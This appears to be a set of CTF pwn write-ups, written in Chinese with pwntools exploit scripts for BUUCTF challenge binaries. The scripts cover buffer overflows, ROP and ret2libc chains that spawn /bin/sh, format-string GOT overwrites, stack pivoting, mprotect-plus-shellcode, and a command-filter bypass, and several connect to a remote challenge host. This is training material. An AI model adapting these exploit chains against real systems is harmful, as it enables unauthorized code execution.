gdb.debug(’./xxx’)
pause()
在弹出窗口设好断点,用 python 传递不可打印字符
堆栈平衡,简单溢出
from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(0xf+8)+p64(ret_addr)+p64(target_addr) p.sendline(pay) #pause() p.interactive()简单溢出
from pwn import * p=process('./warmup_csaw_2016') sys_addr=0x40060d pay='a'*(0x40+8)+p64(sys_addr) p.sendline(pay) p.interactive()程序会将 I 替换成 you
用 I 构造一定长度的 payload 溢出
from pwn import * p=process('./pwn1_sctf_2016') #p=gdb.debug('./pwn1_sctf_2016') get_flag_addr=0x8048F0D #pause() pay='I'*((0x3c+4)/3)+'a'*((0x3c+4)%3)+p32(get_flag_addr) p.sendline(pay) p.interactive()简单覆盖
小数的二进制表示
from pwn import * p=process('./ciscn_2019_n_1') pay='1'*(0x30-4)+p64(0x41348000) p.recvuntil('guess the number.\n') p.sendline(pay) p.interactive()简单的 rop
from pwn import * p=process('./baby_rop') rdi_addr=0x400683 sys_addr=0x400490 sh_addr=0x601048 pay='a'*(0x10+8)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr) p.recvuntil("What's your name?") p.sendline(pay) p.interactive()简单的 rop
from pwn import * p=process('./level2') sh_addr=0x804A024 sys_addr=0x8048320 pay='a'*(0x88+4)+p32(sys_addr)+p32(0)+p32(sh_addr) p.recvuntil('Input:') p.sendline(pay) p.interactive() from pwn import * p=process('./level2_x64') sys_addr=0x4004c0 sh_addr=0x600a90 rdi_addr=0x4006b3 pay='a'*(0x80+8)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr) p.recvuntil('Input:') p.sendline(pay) p.interactive()简单 rop
from pwn import * p=process('./bjdctf_2020_babystack') backdoor=0x4006E6 pay='a'*(0x10+8)+p64(backdoor) p.recvuntil('[+]Please input the length of your name:') p.sendline('100') p.recvuntil("[+]What's u name?") p.sendline(pay) p.interactive()用 one_gadget 找到 exec ,用给出的 printf@plt 算出基址
from pwn import * #p=process('./one_gadget') p=remote('node3.buuoj.cn',28384) libc=ELF('./libc-2.29.so') one_gadget_addr=[0xe237f,0xe2383,0xe2386,0x106ef8] p.recvuntil('0x') printf_addr=int(p.recv(12),16) print hex(printf_addr) libcbase=printf_addr-libc.symbols['printf'] pay=libcbase+one_gadget_addr[3] sleep(0.5) p.sendline(str(pay)) p.interactive()栈溢出泄漏基址,一波 LibcSearcher 冲冲冲
from pwn import * from LibcSearcher import * #context.log_level='debug' #p=process('./ciscn_2019_c_1') p=remote('node3.buuoj.cn',26505) elf=ELF('./ciscn_2019_c_1') puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] main_addr=0x400B28 rdi_addr=0x400c83 ret_addr=0x4006b9 pay='a'*(0x50+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr) p.recvuntil('Input your choice!\n') p.sendline('1') p.recvuntil('Input your Plaintext to be encrypted\n') p.sendline(pay) p.recvuntil('Ciphertext\n') p.recvuntil('\n') puts_addr=u64(p.recv(6)+'\x00\x00') print hex(puts_addr) libc=LibcSearcher('puts',puts_addr) libcbase=puts_addr-libc.dump('puts') sys_addr=libcbase+libc.dump('system') sh_addr=libcbase+libc.dump('str_bin_sh') pay='a'*(0x50+8)+p64(ret_addr)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr) p.recvuntil('Input your choice!\n') p.sendline('1') p.recvuntil('Input your Plaintext to be encrypted\n') p.sendline(pay) p.interactive()堆栈平衡 ret
from pwn import * from LibcSearcher import * #context.log_level='debug' #p=process('./ciscn_2019_n_5') p=remote('node3.buuoj.cn',28418) elf=ELF('./ciscn_2019_n_5') rdi_addr=0x400713 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main_addr=0x400636 ret_addr=0x4004c9 pay='a'*(0x20+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr) p.recvuntil('tell me your name') p.sendline('a') p.recvuntil('What do you want to say to me?\n') p.sendline(pay) puts_addr=u64(p.recv(6)+'\x00\x00') print hex(puts_addr) libc=LibcSearcher('puts',puts_addr) libcbase=puts_addr-libc.dump('puts') sys_addr=libcbase+libc.dump('system') sh_addr=libcbase+libc.dump('str_bin_sh') pay='a'*(0x20+8)+p64(ret_addr)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr) p.recvuntil('tell me your name') p.sendline('a') p.recvuntil('What do you want to say to me?\n') p.sendline(pay) p.interactive()很好的一道题,有多种溢出方法
read 函数读取到 \n
strlen 从 \x00 截断
构造以 \x00 开头的 pay 可以绕过 strcpyn 函数
用输入足够长的 buf 覆盖 v6 使下一个函数中的 buf 可以栈溢出
libc.so 需要基址
leak by puts
#leak by puts elf=ELF('./pwn') puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] main_addr=0x8048825 pay='\x00'+'\xff'*(0x2c-0x25) #use buf to cover v6 to make the length enough p.sendline(pay) p.recvuntil('Correct\n') pay1='a'*(0xe7+4)+p32(puts_plt)+p32(main_addr)+p32(puts_got) p.sendline(pay1) puts_addr=u32(p.recv(4)) print hex(puts_addr) libc=LibcSearcher('puts',puts_addr) libcbase=puts_addr-libc.dump('puts') sys_addr=libcbase+libc.dump('system') sh_addr=libcbase+libc.dump('str_bin_sh') pay1='a'*(0xe7+4)+p32(sys_addr)+p32(1)+p32(sh_addr) p.sendline(pay) p.recvuntil('Correct\n') p.sendline(pay1) p.interactive()leak by write
#leak by write elf=ELF('./pwn') #libc=ELF('./libc-2.23.so') write_got=elf.got['write'] write_plt=elf.plt['write'] main_addr=0x8048825 pay='\x00'+'\xff'*(0x2c-0x25) #use buf to cover v6 to make the length enough p.sendline(pay) p.recvuntil('Correct\n') pay1='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4) p.sendline(pay1) write_addr=u32(p.recv(4)) print hex(write_addr) libc=LibcSearcher('write',write_addr) libcbase=write_addr-libc.dump('write') sys_addr=libcbase+libc.dump('system') sh_addr=libcbase+libc.dump('str_bin_sh') pay1='a'*(0xe7+4)+p32(sys_addr)+p32(1)+p32(sh_addr) p.sendline(pay) p.recvuntil('Correct\n') p.sendline(pay1) p.interactive()leak by libc.so
from pwn import * from LibcSearcher import * #p=process('./pwn') p=remote('node3.buuoj.cn',26060) #arch 32 # leak by libc.so elf=ELF('./pwn') libc=ELF('./libc-2.23.so') pay='\x00'+'\xff'*(0x2c-0x25) p.sendline(pay) p.recvuntil('Correct\n') write_got=elf.got['write'] write_plt=elf.plt['write'] main_addr=0x8048825 sys_addr=libc.symbols['system'] sh_addr=libc.search('/bin/sh').next() pay1='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4) p.sendline(pay1) write_addr=u32(p.recv(4)) libcbase=write_addr-libc.symbols['write'] sys_addr+=libcbase sh_addr+=libcbase pay1='a'*(0xe7+4)+p32(sys_addr)+p32(1)+p32(sh_addr) p.sendline(pay) p.recvuntil('Correct\n') p.sendline(pay1) p.interactive()integer overflow
from pwn import * from LibcSearcher import * #context.log_level='debug' #p=process('./pwn2_sctf_2016') p=remote('node3.buuoj.cn',29029) elf=ELF('./pwn2_sctf_2016') #p=gdb.debug('./pwn2_sctf_2016') ret_addr=0x8048346 format_addr=0x80486F8 printf_got=elf.got['printf'] printf_plt=elf.plt['printf'] pop2_addr=0x804864e main_addr=0x80485B8 pay='a'*(0x2c+4)+p32(printf_plt)+p32(pop2_addr)+p32(format_addr)+p32(printf_got)+p32(main_addr) p.recvuntil('How many bytes do you want me to read?') p.sendline('-1') p.recvuntil('bytes of data!') p.sendline(pay) p.recvuntil('You said: ') p.recvuntil('You said: ') printf_addr=u32(p.recv(4)) print hex(printf_addr) libc=LibcSearcher('printf',printf_addr) libcbase=printf_addr-libc.dump('printf') sys_addr=libcbase+libc.dump('system') sh_addr=libcbase+libc.dump('str_bin_sh') pay='a'*(0x2c+4)+p32(sys_addr)+'a'*4+p32(sh_addr) p.recvuntil('How many bytes do you want me to read?') p.sendline('-1') p.recvuntil('bytes of data!') p.sendline(pay) p.interactive()mprotect
直接溢出到 get_flag 会在读取文件的时候莫名错误
mprotect 给 bss(似乎必须是 0x1000 的整数倍,页对齐?)加权限
x86 的多函数 payload 模板
offset+p32(func1_addr)+p32(pop1)+p32(para_for_func1) +p32(func1_addr)+p32(pop2)+p32(para_for_func2) from pwn import * p=process('./get_started_3dsctf_2016') elf=ELF('./get_started_3dsctf_2016') #p=gdb.debug('./get_started_3dsctf_2016') #pause() mprotect_addr=0x806EC80 bss_addr=0x80e9000 read_addr=elf.symbols['read'] pop3_addr=0x80483b8 pay='a'*0x38+p32(mprotect_addr)+p32(pop3_addr) pay+=p32(bss_addr)+p32(0x200)+p32(0x7) pay+=p32(read_addr)+p32(bss_addr)+p32(0)+p32(bss_addr)+p32(0x200) p.sendline(pay) sleep(0.2) pay=asm(shellcraft.sh()) p.sendline(pay) p.interactive()get_secret 将 flag 写入 bss 段,可以用 write 函数将 bss 写出
mprotect_addr=0x806ED40 read_addr=0x806E200 bss_addr=0x80ec000 pop3_addr=0x809e3e5 pay='a'*(45)+p32(mprotect_addr)+p32(pop3_addr)+p32(bss_addr)+p32(0x200)+p32(7) pay+=p32(read_addr)+p32(bss_addr)+p32(0)+p32(bss_addr)+p32(0x200) #p.recvuntil('b0r4') sleep(0.5) p.sendline(pay) sleep(0.5) p.sendline(asm(shellcraft.sh())) p.interactive()格式化字符漏洞,姿势众多
覆盖判断变量,绕过判断
from pwn import * p=process('./pwn5') target_addr=0x804C044 offset=10 pay=fmtstr_payload(offset,{target_addr:0x11111111}) p.recvuntil('name:') p.sendline(pay) p.recvuntil('passwd:') p.sendline(str(0x11111111)) p.interactive()把 atoi 的 got 表改成 system() 读入 /bin/sh 劫持函数
from pwn import * p=process('./pwn5') elf=ELF('./pwn5') atoi_addr=elf.got['atoi'] sys_addr=elf.symbols['system'] offset=10 pay=fmtstr_payload(offset,{atoi_addr:sys_addr}) p.recvuntil('name:') p.sendline(pay) p.recvuntil('passwd:') p.sendline('/bin/sh\x00') p.interactive()覆盖 read atoi printf puts 的 got 表劫持程序流程
from pwn import * p=process('./pwn5') #p=gdb.debug('./pwn5') elf=ELF('./pwn5') printf_addr=elf.got['printf'] read_addr=elf.got['read'] #puts_addr=elf.got['puts'] atoi_addr=elf.got['atoi'] sys_addr=0x804931A#bypass judgment offset=10 pay=fmtstr_payload(offset,{read_addr:sys_addr}) p.recvuntil('name:') p.sendline(pay) p.recvuntil('passwd:') p.sendline(str(0x11111111)) p.interactive() #leaking by puts is not available,maybe something is wrong长度变量 v3 为 unsign int8,超过 0xff 溢出,所以可以用长度为 0x104~0x108 的字符串整形溢出
strlen 和 strcpy 都存在 \x00 截断,不能用 \x00 绕过长度验证
from pwn import * p=process('./r2t3') sh_addr=0x804858B pay='a'*(0x11+4)+p32(sh_addr)+'a'*(0x104-0x11-4-4) p.recvuntil('Please input your name:') p.sendline(pay) p.interactive()_QWORD 为 4 个字节
from pwn import * p=process('./ciscn_2019_n_8') pay='a'*(13*4)+p64(17) p.recvuntil('name?') p.sendline(pay) p.interactive()migrate to stack
from pwn import * #p=gdb.debug('./ciscn_2019_es_2') #p=process('./ciscn_2019_es_2') p=remote('node3.buuoj.cn',28334) sys_addr=0x8048400 leave_ret=0x80484b8 pay='a'*0x28 p.sendafter("Welcome, my friend. What's your name?\n",pay) p.recvuntil('a'*0x28) ebp_addr=u32(p.recv(4)) print hex(ebp_addr) pay=('a'*4+p32(sys_addr)+'b'*4+p32(ebp_addr-0x28)+'/bin/sh\x00').ljust(0x28,'p')+p32(ebp_addr-0x38)+p32(leave_ret) #pay=('a'*8+p32(ebp_addr-0x24)+'b'*4+p32(sys_addr)+'c'*4+p32(ebp_addr-0x1c)+'/bin/sh\x00').ljust(0x28,'p')+p32(ebp_addr-0x2c)#+p32(leave_ret) #perfectly use function main's leave sleep(0.2) p.sendline(pay) p.interactive()migrate to .bss
from pwn import * from LibcSearcher import * #context.log_level='debug' #p=gdb.debug('./spwn') #p=process('./spwn') p=remote('node3.buuoj.cn',28086) elf=ELF('./spwn') s_addr=0x804A300 leave_ret=0x8048408 write_plt=elf.plt['write'] write_got=elf.got['write'] pop3_addr=0x80485a9 ret_addr=0x8048312 main_addr=0x8048513 pay='a'*4+p32(write_plt)+p32(pop3_addr)+p32(1)+p32(write_got)+p32(4)+p32(main_addr) p.recvuntil('What is your name?') p.sendline(pay) pay='a'*(0x18)+p32(s_addr)+p32(leave_ret) p.recvuntil('What do you want to say?') p.send(pay) #sleep(0.5) write_addr=u32(p.recv(4)) print hex(write_addr) libc=LibcSearcher('write',write_addr) libcbase=write_addr-libc.dump('write') sys_addr=libcbase+libc.dump('system') sh_addr=libcbase+libc.dump('str_bin_sh') pay='a'*4+p32(sys_addr)+'a'*4+p32(sh_addr)#+p32(main_addr) p.recvuntil('What is your name?') p.sendline(pay) pay='a'*(0x18)+p32(s_addr)+p32(leave_ret) p.recvuntil('What do you want to say?') p.sendline(pay) p.interactive()ssh 使用和 system 的特殊使用
test.c在if 判断这块过滤了很多命令,取下的过滤规则是 “n|e|p|b|u|s|h|i|f|l|a|g”,可以使用下面命令,查看剩余可以使用的命令ls /usr/bin/ /bin/ | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g" from pwn import * shell=ssh('ctf','node3.buuoj.cn',password='test',port=29706) p=shell.run('sh') p.sendline('./test') sleep(0.2) p.sendline('x86_64') p.sendline('cat flag') p.interactive()